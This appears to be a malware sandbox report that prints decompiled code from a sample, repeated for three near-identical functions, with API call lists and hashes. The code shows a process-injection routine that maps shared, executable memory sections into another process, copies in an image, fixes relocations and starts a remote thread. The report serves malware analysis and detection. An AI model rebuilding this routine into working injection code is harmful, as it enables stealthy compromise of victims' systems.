                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: a1a548987cee5af6a20eaada0c048d68b1c52e2eb5f25007b876aabe9c92dcad
                    • Instruction ID: a241dfb1a7147892ad06c72b7904183168c99d91159797a80032ec6269488466
                    • Opcode Fuzzy Hash: a1a548987cee5af6a20eaada0c048d68b1c52e2eb5f25007b876aabe9c92dcad
                    • Instruction Fuzzy Hash: E2513F74900209BFEB208F91CC89FAF7BB8EF85B50F10412AF911BA1E5D7749941CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401446 Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 125 401446-401482 call 401134 133 401484 125->133 134 401487-40148c 125->134 133->134 136 4017b2-4017ba 134->136 137 401492-4014a3 134->137 136->134 140 4017b0-4017d3 137->140 141 4014a9-4014d2 137->141 149 4017e5 140->149 141->140 148 4014d8-4014ef NtDuplicateObject 141->148 148->140 150 4014f5-401519 NtCreateSection 148->150 152 401575-40159b NtCreateSection 150->152 153 40151b-40153c NtMapViewOfSection 150->153 152->140 157 4015a1-4015a5 152->157 153->152 155 40153e-40155a NtMapViewOfSection 153->155 155->152 158 40155c-401572 155->158 157->140 159 4015ab-4015cc NtMapViewOfSection 157->159 158->152 159->140 160 4015d2-4015ee NtMapViewOfSection 159->160 160->140 162 4015f4 call 4015f9 160->162
                    C-Code - Quality: 56%
                    			E00401446(void* __eax, void* __edi) {
				intOrPtr _t85;
				intOrPtr _t88;
				long _t91;
				void* _t92;
				struct _GUID _t99;
				struct _GUID _t101;
				PVOID* _t103;
				PVOID* _t105;
				intOrPtr* _t109;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				long* _t131;
				signed int _t138;
				int _t139;
				intOrPtr _t156;
				void* _t161;
				intOrPtr* _t162;
				void* _t165;
				long _t173;
				intOrPtr _t175;
				void* _t176;
				long* _t181;
				intOrPtr* _t183;
				HANDLE* _t184;
				HANDLE* _t185;
				void* _t190;
				void* _t191;
				intOrPtr* _t194;
				void* _t195;
				void* _t198;
				void* _t199;
				intOrPtr* _t201;
				void* _t202;
				void* _t204;
				intOrPtr* _t205;
				void* _t209;
				long _t223;
				void* _t229;

				asm("sbb bh, [edx]");
				_t209 = __eax - 0x78;
				asm("int 0xaa");
				_push(0x1474);
				_t85 =  *_t201;
				_t202 = _t201 + 4;
				E00401134(_t85, __edi, _t209, _t229);
				_t127 =  *((intOrPtr*)(_t199 + 8));
				_t173 = 0;
				 *((intOrPtr*)(_t199 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t199 - 0x34)) =  *((intOrPtr*)(_t199 - 0x34)) + 1;
				}
				while(1) {
					_t88 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t88 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t199 - 0x5c)) = _t88;
				_t181 = _t199 - 0x60;
				 *_t181 = _t173;
				 *((intOrPtr*)(_t127 + 0x4c))(_t88, _t181);
				_t91 =  *_t181;
				if(_t91 != 0) {
					_t131 = _t199 - 0x30;
					 *_t131 = _t91;
					_t131[1] = _t173;
					_t183 = _t199 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t183, 0x18);
					 *_t183 = 0x18;
					_push(_t199 - 0x30);
					_push(_t183);
					_push(0x40);
					_push(_t199 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t199 - 0x10), 0xffffffff, 0xffffffff, _t199 - 0xc, _t173, _t173, 2) == 0) {
						 *(_t199 - 8) = _t173;
						_t99 = _t199 - 0x50;
						 *(_t99 + 4) = _t173;
						 *_t99 = 0x5000;
						_t184 = _t199 - 0x54;
						if(NtCreateSection(_t184, 6, _t173, _t99, 4, 0x8000000, _t173) == 0) {
							 *_t25 =  *(_t199 - 0x50);
							_t121 = _t199 - 0x44;
							 *_t121 = _t173;
							if(NtMapViewOfSection( *_t184, 0xffffffff, _t121, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 4) == 0) {
								_t123 = _t199 - 0x3c;
								 *_t123 = _t173;
								if(NtMapViewOfSection( *_t184,  *(_t199 - 0xc), _t123, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 4) == 0) {
									_t198 =  *(_t199 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t173, _t198, 0x104);
									 *((intOrPtr*)(_t198 + 0x208)) =  *((intOrPtr*)(_t199 + 0x14));
									 *(_t199 - 8) =  *(_t199 - 8) + 1;
								}
							}
						}
						_t101 = _t199 - 0x50;
						 *(_t101 + 4) = _t173;
						 *_t101 =  *((intOrPtr*)(_t199 + 0x10)) + 0x10000;
						_t185 = _t199 - 0x58;
						if(NtCreateSection(_t185, 0xe, _t173, _t101, 0x40, 0x8000000, _t173) == 0 &&  *(_t199 - 8) != 0) {
							 *_t46 =  *(_t199 - 0x50);
							_t103 = _t199 - 0x48;
							 *_t103 = _t173;
							if(NtMapViewOfSection( *_t185, 0xffffffff, _t103, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 4) == 0) {
								_t105 = _t199 - 0x40;
								 *_t105 = _t173;
								_t223 = NtMapViewOfSection( *_t185,  *(_t199 - 0xc), _t105, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 0x20);
								if(_t223 == 0) {
									L20();
									if(_t223 == 0 && _t223 != 0) {
										asm("xlatb");
										asm("rcl dword [ebx], 0x8b");
									}
									_t204 = _t202 + 4;
									_push(0x2eb0);
									_t205 = _t204 + 4;
									_push(0x2260);
									_t156 =  *_t205;
									_push(_t156);
									asm("lodsb");
									asm("loop 0xffffffc9");
									_t190 =  *((intOrPtr*)(_t199 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0xc))));
									_t138 =  *(_t190 + 6) & 0x0000ffff;
									_push(_t190);
									_t161 = _t190;
									if( *((intOrPtr*)(_t199 - 0x34)) == 0) {
										_t162 = _t161 + 0xf8;
										__eflags = _t162;
									} else {
										_t162 = _t161 + 0x108;
									}
									_push(_t138);
									_t139 =  *(_t162 + 0x10);
									if(_t139 != 0) {
										memcpy( *((intOrPtr*)(_t162 + 0xc)) +  *(_t199 - 0x48),  *((intOrPtr*)(_t162 + 0x14)) +  *((intOrPtr*)(_t199 + 0xc)), _t139);
									}
									asm("loop 0xffffffe6");
									_pop(_t191);
									if( *((intOrPtr*)(_t199 - 0x34)) == 0) {
										_push(_t191);
										_t165 =  *((intOrPtr*)(_t191 + 0x34)) -  *(_t199 - 0x40);
										_t194 =  *((intOrPtr*)(_t191 + 0xa0)) +  *(_t199 - 0x48);
										__eflags = _t194;
										while(1) {
											__eflags =  *_t194;
											if( *_t194 == 0) {
												break;
											}
											_t175 =  *_t194;
											_t194 = _t194 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t165;
												__eflags =  *((intOrPtr*)(0 +  *(_t199 - 0x48) + _t175));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t195);
										_t173 = 0;
										__eflags = 0;
										_t109 = _t199 - 4;
										 *_t109 = 0;
										 *((intOrPtr*)(_t127 + 0x98))( *(_t199 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t195 + 0x28)) +  *(_t199 - 0x40),  *(_t199 - 0x3c), _t109, 0);
									} else {
										L53();
										_pop(_t176);
										_t173 = _t176 - 0x16ee;
										 *((intOrPtr*)(_t173 + 0x1722)) = _t173 + 0x2bbb;
										L004011C3();
										0x33(_t173 + 0x2bbb, 0x1ad);
										 *((intOrPtr*)(_t173 + 0x1747)) = _t173 + 0x2c0b;
										0x33();
									}
								}
							}
						}
					}
				}
				_t92 = 0x1474;
				_push(0x379);
			}










































                    0x00401446
                    0x00401448
                    0x0040144a
                    0x0040144c
                    0x00401451
                    0x00401454
                    0x0040146f
                    0x00401474
                    0x00401477
                    0x00401479
                    0x00401482
                    0x00401484
                    0x00401484
                    0x00401487
                    0x00401487
                    0x0040148c
                    0x00000000
                    0x00000000
                    0x004017b7
                    0x004017b7
                    0x00401492
                    0x00401495
                    0x00401498
                    0x0040149c
                    0x0040149f
                    0x004014a3
                    0x004014a9
                    0x004014ac
                    0x004014ae
                    0x004014b1
                    0x004014b7
                    0x004014ba
                    0x004014c8
                    0x004014c9
                    0x004014ca
                    0x004014cc
                    0x004014d2
                    0x004014f5
                    0x004014f8
                    0x004014fb
                    0x004014fe
                    0x00401504
                    0x00401519
                    0x0040151e
                    0x00401521
                    0x00401524
                    0x0040153c
                    0x0040153e
                    0x00401541
                    0x0040155a
                    0x0040155c
                    0x00401566
                    0x0040156c
                    0x00401572
                    0x00401572
                    0x0040155a
                    0x0040153c
                    0x00401575
                    0x00401581
                    0x00401584
                    0x00401586
                    0x0040159b
                    0x004015ae
                    0x004015b1
                    0x004015b4
                    0x004015cc
                    0x004015d2
                    0x004015d5
                    0x004015ec
                    0x004015ee
                    0x004015f4
                    0x004015f9
                    0x004015fd
                    0x004015fe
                    0x004015fe
                    0x00401603
                    0x00401628
                    0x00401630
                    0x00401642
                    0x00401647
                    0x00401659
                    0x0040167e
                    0x0040168b
                    0x004016a9
                    0x004016ab
                    0x004016af
                    0x004016b0
                    0x004016b6
                    0x004016c0
                    0x004016c0
                    0x004016b8
                    0x004016b8
                    0x004016b8
                    0x004016c6
                    0x004016c7
                    0x004016cc
                    0x004016da
                    0x004016da
                    0x004016e0
                    0x004016e2
                    0x004016e7
                    0x0040174f
                    0x00401753
                    0x0040175e
                    0x0040175e
                    0x00401761
                    0x00401761
                    0x00401764
                    0x00000000
                    0x00000000
                    0x00401766
                    0x00401770
                    0x00401775
                    0x00401777
                    0x0040177c
                    0x00401788
                    0x00401788
                    0x00401788
                    0x0040178a
                    0x0040178a
                    0x0040178e
                    0x00401795
                    0x00401795
                    0x00401797
                    0x0040179a
                    0x004017aa
                    0x004016e9
                    0x004016e9
                    0x004016ee
                    0x004016ef
                    0x00401705
                    0x00401714
                    0x00401721
                    0x00401738
                    0x00401746
                    0x00401746
                    0x004016e7
                    0x004015ee
                    0x004015cc
                    0x0040159b
                    0x004014d2
                    0x004017cb
                    0x004017db

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: aa239b2ee7b7a1a0b3ffb45dfca917dbddb9bacbaae0f77fc96c0f4f43538294
                    • Instruction ID: 875affe5b8015aa942028eb222aca49a3761eb159d59d404aa124f65acbec2ce
                    • Opcode Fuzzy Hash: aa239b2ee7b7a1a0b3ffb45dfca917dbddb9bacbaae0f77fc96c0f4f43538294
                    • Instruction Fuzzy Hash: 83511B74900249BFEB208F91CC89FEFBBB8EF85B10F104159F951AA2A5D7749945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040145D Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 164 40145d-401482 call 401134 171 401484 164->171 172 401487-40148c 164->172 171->172 174 4017b2-4017ba 172->174 175 401492-4014a3 172->175 174->172 178 4017b0-4017d3 175->178 179 4014a9-4014d2 175->179 187 4017e5 178->187 179->178 186 4014d8-4014ef NtDuplicateObject 179->186 186->178 188 4014f5-401519 NtCreateSection 186->188 190 401575-40159b NtCreateSection 188->190 191 40151b-40153c NtMapViewOfSection 188->191 190->178 195 4015a1-4015a5 190->195 191->190 193 40153e-40155a NtMapViewOfSection 191->193 193->190 196 40155c-401572 193->196 195->178 197 4015ab-4015cc NtMapViewOfSection 195->197 196->190 197->178 198 4015d2-4015ee NtMapViewOfSection 197->198 198->178 200 4015f4 call 4015f9 198->200
                    C-Code - Quality: 57%
                    			E0040145D(void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr* _t108;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				long* _t130;
				signed int _t137;
				int _t138;
				intOrPtr _t155;
				void* _t160;
				intOrPtr* _t161;
				void* _t164;
				long _t172;
				intOrPtr _t174;
				void* _t175;
				long* _t180;
				intOrPtr* _t182;
				HANDLE* _t183;
				HANDLE* _t184;
				void* _t189;
				void* _t190;
				intOrPtr* _t193;
				void* _t194;
				void* _t197;
				void* _t198;
				void* _t200;
				void* _t202;
				intOrPtr* _t203;
				long _t221;
				void* _t227;

				asm("outsd");
				E00401134(_t84, __edi, __eflags, _t227);
				_t126 =  *((intOrPtr*)(_t198 + 8));
				_t172 = 0;
				 *((intOrPtr*)(_t198 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t198 - 0x34)) =  *((intOrPtr*)(_t198 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t198 - 0x5c)) = _t87;
				_t180 = _t198 - 0x60;
				 *_t180 = _t172;
				 *((intOrPtr*)(_t126 + 0x4c))(_t87, _t180);
				_t90 =  *_t180;
				if(_t90 != 0) {
					_t130 = _t198 - 0x30;
					 *_t130 = _t90;
					_t130[1] = _t172;
					_t182 = _t198 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t182, 0x18);
					 *_t182 = 0x18;
					_push(_t198 - 0x30);
					_push(_t182);
					_push(0x40);
					_push(_t198 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t198 - 0x10), 0xffffffff, 0xffffffff, _t198 - 0xc, _t172, _t172, 2) == 0) {
						 *(_t198 - 8) = _t172;
						_t98 = _t198 - 0x50;
						 *(_t98 + 4) = _t172;
						 *_t98 = 0x5000;
						_t183 = _t198 - 0x54;
						if(NtCreateSection(_t183, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
							 *_t25 =  *(_t198 - 0x50);
							_t120 = _t198 - 0x44;
							 *_t120 = _t172;
							if(NtMapViewOfSection( *_t183, 0xffffffff, _t120, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
								_t122 = _t198 - 0x3c;
								 *_t122 = _t172;
								if(NtMapViewOfSection( *_t183,  *(_t198 - 0xc), _t122, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
									_t197 =  *(_t198 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t172, _t197, 0x104);
									 *((intOrPtr*)(_t197 + 0x208)) =  *((intOrPtr*)(_t198 + 0x14));
									 *(_t198 - 8) =  *(_t198 - 8) + 1;
								}
							}
						}
						_t100 = _t198 - 0x50;
						 *(_t100 + 4) = _t172;
						 *_t100 =  *((intOrPtr*)(_t198 + 0x10)) + 0x10000;
						_t184 = _t198 - 0x58;
						if(NtCreateSection(_t184, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 &&  *(_t198 - 8) != 0) {
							 *_t46 =  *(_t198 - 0x50);
							_t102 = _t198 - 0x48;
							 *_t102 = _t172;
							if(NtMapViewOfSection( *_t184, 0xffffffff, _t102, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
								_t104 = _t198 - 0x40;
								 *_t104 = _t172;
								_t221 = NtMapViewOfSection( *_t184,  *(_t198 - 0xc), _t104, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 0x20);
								if(_t221 == 0) {
									L19();
									if(_t221 == 0 && _t221 != 0) {
										asm("xlatb");
										asm("rcl dword [ebx], 0x8b");
									}
									_t202 = _t200 + 4;
									_push(0x2eb0);
									_t203 = _t202 + 4;
									_push(0x2260);
									_t155 =  *_t203;
									_push(_t155);
									asm("lodsb");
									asm("loop 0xffffffc9");
									_t189 =  *((intOrPtr*)(_t198 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t198 + 0xc))));
									_t137 =  *(_t189 + 6) & 0x0000ffff;
									_push(_t189);
									_t160 = _t189;
									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
										_t161 = _t160 + 0xf8;
										__eflags = _t161;
									} else {
										_t161 = _t160 + 0x108;
									}
									_push(_t137);
									_t138 =  *(_t161 + 0x10);
									if(_t138 != 0) {
										memcpy( *((intOrPtr*)(_t161 + 0xc)) +  *(_t198 - 0x48),  *((intOrPtr*)(_t161 + 0x14)) +  *((intOrPtr*)(_t198 + 0xc)), _t138);
									}
									asm("loop 0xffffffe6");
									_pop(_t190);
									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
										_push(_t190);
										_t164 =  *((intOrPtr*)(_t190 + 0x34)) -  *(_t198 - 0x40);
										_t193 =  *((intOrPtr*)(_t190 + 0xa0)) +  *(_t198 - 0x48);
										__eflags = _t193;
										while(1) {
											__eflags =  *_t193;
											if( *_t193 == 0) {
												break;
											}
											_t174 =  *_t193;
											_t193 = _t193 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
												__eflags =  *((intOrPtr*)(0 +  *(_t198 - 0x48) + _t174));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t194);
										_t172 = 0;
										__eflags = 0;
										_t108 = _t198 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t126 + 0x98))( *(_t198 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t194 + 0x28)) +  *(_t198 - 0x40),  *(_t198 - 0x3c), _t108, 0);
									} else {
										L52();
										_pop(_t175);
										_t172 = _t175 - 0x16ee;
										 *((intOrPtr*)(_t172 + 0x1722)) = _t172 + 0x2bbb;
										L004011C3();
										0x33(_t172 + 0x2bbb, 0x1ad);
										 *((intOrPtr*)(_t172 + 0x1747)) = _t172 + 0x2c0b;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x1474;
				_push(0x379);
			}








































                    0x0040145d
                    0x0040146f
                    0x00401474
                    0x00401477
                    0x00401479
                    0x00401482
                    0x00401484
                    0x00401484
                    0x00401487
                    0x00401487
                    0x0040148c
                    0x00000000
                    0x00000000
                    0x004017b7
                    0x004017b7
                    0x00401492
                    0x00401495
                    0x00401498
                    0x0040149c
                    0x0040149f
                    0x004014a3
                    0x004014a9
                    0x004014ac
                    0x004014ae
                    0x004014b1
                    0x004014b7
                    0x004014ba
                    0x004014c8
                    0x004014c9
                    0x004014ca
                    0x004014cc
                    0x004014d2
                    0x004014f5
                    0x004014f8
                    0x004014fb
                    0x004014fe
                    0x00401504
                    0x00401519
                    0x0040151e
                    0x00401521
                    0x00401524
                    0x0040153c
                    0x0040153e
                    0x00401541
                    0x0040155a
                    0x0040155c
                    0x00401566
                    0x0040156c
                    0x00401572
                    0x00401572
                    0x0040155a
                    0x0040153c
                    0x00401575
                    0x00401581
                    0x00401584
                    0x00401586
                    0x0040159b
                    0x004015ae
                    0x004015b1
                    0x004015b4
                    0x004015cc
                    0x004015d2
                    0x004015d5
                    0x004015ec
                    0x004015ee
                    0x004015f4
                    0x004015f9
                    0x004015fd
                    0x004015fe
                    0x004015fe
                    0x00401603
                    0x00401628
                    0x00401630
                    0x00401642
                    0x00401647
                    0x00401659
                    0x0040167e
                    0x0040168b
                    0x004016a9
                    0x004016ab
                    0x004016af
                    0x004016b0
                    0x004016b6
                    0x004016c0
                    0x004016c0
                    0x004016b8
                    0x004016b8
                    0x004016b8
                    0x004016c6
                    0x004016c7
                    0x004016cc
                    0x004016da
                    0x004016da
                    0x004016e0
                    0x004016e2
                    0x004016e7
                    0x0040174f
                    0x00401753
                    0x0040175e
                    0x0040175e
                    0x00401761
                    0x00401761
                    0x00401764
                    0x00000000
                    0x00000000
                    0x00401766
                    0x00401770
                    0x00401775
                    0x00401777
                    0x0040177c
                    0x00401788
                    0x00401788
                    0x00401788
                    0x0040178a
                    0x0040178a
                    0x0040178e
                    0x00401795
                    0x00401795
                    0x00401797
                    0x0040179a
                    0x004017aa
                    0x004016e9
                    0x004016e9
                    0x004016ee
                    0x004016ef
                    0x00401705
                    0x00401714
                    0x00401721
                    0x00401738
                    0x00401746
                    0x00401746
                    0x004016e7
                    0x004015ee
                    0x004015cc
                    0x0040159b
                    0x004014d2
                    0x004017cb
                    0x004017db

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: c777d85a313d6204129e744fdb44d59ecbedb6b98fa3d971b816145188cb92c2
                    • Instruction ID: 64f050098b634efaf460332bf9a79526af7b9d542430e692bb7884b77a16f5e9
                    • Opcode Fuzzy Hash: c777d85a313d6204129e744fdb44d59ecbedb6b98fa3d971b816145188cb92c2
                    • Instruction Fuzzy Hash: C551FA75900249BFEB208F91CC89FAF7BB8FF85B10F104159FA11AA2A5D7749945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401460 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 202 401460-401482 call 401134 206 401484 202->206 207 401487-40148c 202->207 206->207 209 4017b2-4017ba 207->209 210 401492-4014a3 207->210 209->207 213 4017b0-4017d3 210->213 214 4014a9-4014d2 210->214 222 4017e5 213->222 214->213 221 4014d8-4014ef NtDuplicateObject 214->221 221->213 223 4014f5-401519 NtCreateSection 221->223 225 401575-40159b NtCreateSection 223->225 226 40151b-40153c NtMapViewOfSection 223->226 225->213 230 4015a1-4015a5 225->230 226->225 228 40153e-40155a NtMapViewOfSection 226->228 228->225 231 40155c-401572 228->231 230->213 232 4015ab-4015cc NtMapViewOfSection 230->232 231->225 232->213 233 4015d2-4015ee NtMapViewOfSection 232->233 233->213 235 4015f4 call 4015f9 233->235
                    C-Code - Quality: 59%
                    			E00401460(signed int __eax, void* __edi) {
				intOrPtr _t88;
				long _t91;
				void* _t92;
				struct _GUID _t99;
				struct _GUID _t101;
				PVOID* _t103;
				PVOID* _t105;
				intOrPtr* _t109;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				long* _t132;
				signed int _t139;
				int _t140;
				intOrPtr _t157;
				void* _t162;
				intOrPtr* _t163;
				void* _t166;
				long _t174;
				intOrPtr _t176;
				void* _t177;
				long* _t182;
				intOrPtr* _t184;
				HANDLE* _t185;
				HANDLE* _t186;
				void* _t191;
				void* _t192;
				intOrPtr* _t195;
				void* _t196;
				void* _t199;
				void* _t200;
				void* _t202;
				void* _t204;
				intOrPtr* _t205;
				signed char _t209;
				long _t223;
				void* _t229;

				_t85 = __eax | 0x00000076;
				_t209 = __eax | 0x00000076;
				E00401134(_t85, __edi, _t209, _t229);
				_t127 =  *((intOrPtr*)(_t200 + 8));
				_t174 = 0;
				 *((intOrPtr*)(_t200 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t200 - 0x34)) =  *((intOrPtr*)(_t200 - 0x34)) + 1;
				}
				while(1) {
					_t88 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t88 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t200 - 0x5c)) = _t88;
				_t182 = _t200 - 0x60;
				 *_t182 = _t174;
				 *((intOrPtr*)(_t127 + 0x4c))(_t88, _t182);
				_t91 =  *_t182;
				if(_t91 != 0) {
					_t132 = _t200 - 0x30;
					 *_t132 = _t91;
					_t132[1] = _t174;
					_t184 = _t200 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t184, 0x18);
					 *_t184 = 0x18;
					_push(_t200 - 0x30);
					_push(_t184);
					_push(0x40);
					_push(_t200 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t200 - 0x10), 0xffffffff, 0xffffffff, _t200 - 0xc, _t174, _t174, 2) == 0) {
						 *(_t200 - 8) = _t174;
						_t99 = _t200 - 0x50;
						 *(_t99 + 4) = _t174;
						 *_t99 = 0x5000;
						_t185 = _t200 - 0x54;
						if(NtCreateSection(_t185, 6, _t174, _t99, 4, 0x8000000, _t174) == 0) {
							 *_t25 =  *(_t200 - 0x50);
							_t121 = _t200 - 0x44;
							 *_t121 = _t174;
							if(NtMapViewOfSection( *_t185, 0xffffffff, _t121, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 4) == 0) {
								_t123 = _t200 - 0x3c;
								 *_t123 = _t174;
								if(NtMapViewOfSection( *_t185,  *(_t200 - 0xc), _t123, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 4) == 0) {
									_t199 =  *(_t200 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t174, _t199, 0x104);
									 *((intOrPtr*)(_t199 + 0x208)) =  *((intOrPtr*)(_t200 + 0x14));
									 *(_t200 - 8) =  *(_t200 - 8) + 1;
								}
							}
						}
						_t101 = _t200 - 0x50;
						 *(_t101 + 4) = _t174;
						 *_t101 =  *((intOrPtr*)(_t200 + 0x10)) + 0x10000;
						_t186 = _t200 - 0x58;
						if(NtCreateSection(_t186, 0xe, _t174, _t101, 0x40, 0x8000000, _t174) == 0 &&  *(_t200 - 8) != 0) {
							 *_t46 =  *(_t200 - 0x50);
							_t103 = _t200 - 0x48;
							 *_t103 = _t174;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t103, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 4) == 0) {
								_t105 = _t200 - 0x40;
								 *_t105 = _t174;
								_t223 = NtMapViewOfSection( *_t186,  *(_t200 - 0xc), _t105, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 0x20);
								if(_t223 == 0) {
									L17();
									if(_t223 == 0 && _t223 != 0) {
										asm("xlatb");
										asm("rcl dword [ebx], 0x8b");
									}
									_t204 = _t202 + 4;
									_push(0x2eb0);
									_t205 = _t204 + 4;
									_push(0x2260);
									_t157 =  *_t205;
									_push(_t157);
									asm("lodsb");
									asm("loop 0xffffffc9");
									_t191 =  *((intOrPtr*)(_t200 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc))));
									_t139 =  *(_t191 + 6) & 0x0000ffff;
									_push(_t191);
									_t162 = _t191;
									if( *((intOrPtr*)(_t200 - 0x34)) == 0) {
										_t163 = _t162 + 0xf8;
										__eflags = _t163;
									} else {
